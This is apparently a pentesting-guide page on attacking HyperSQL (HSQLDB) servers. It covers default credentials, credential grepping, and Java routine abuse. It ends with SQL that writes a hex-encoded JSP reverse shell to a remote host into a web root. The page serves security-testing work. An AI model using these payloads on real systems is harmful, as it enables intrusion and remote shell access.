I came across this one today and noticed it's not yet covered in your book. Thought this would be a nice addition since it's a piece of common-ish software with little to no pentesting coverage on the web.
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9001 - Pentesting HyperSQL Server (HSQLDB)
Basic Information
HSQLDB (HyperSQL DataBase) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.
Default port: 9001
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
Information
Default Settings
Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.
Default credentials are usually sa
with a blank password.
If you've exploited another service, search for possible credentials using
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
Note the database name carefully - you'll need it to connect.
Info Gathering
Connect to the DB instance by downloading HSQLDB and extracting hsqldb/lib/hsqldb.jar
. Run the GUI app (eww) using java -jar hsqldb.jar
and connect to the instance using the discovered/weak credentials.
Note the connection URL will look something like this for a remote system: jdbc:hsqldb:hsql://ip/DBNAME
.
Tricks
Java Language Routines
We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.
JRTs can be functions
or procedures
. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the VALUES
statement.
If the Java method we want to call returns void, we need to use a procedure invoked with the CALL
statement.
Reading Java System Properties
Create function:
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
Execute function:
VALUES(getsystemproperty('user.name'))
You can find a list of system properties here.
Write Content to File
You can use the com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename
Java gadget located in the JDK (auto loaded into the class path of the application) to write hex-encoded items to disk via a custom procedure. Note the maximum size of 1024 bytes.
Create procedure:
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
Execute procedure:
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))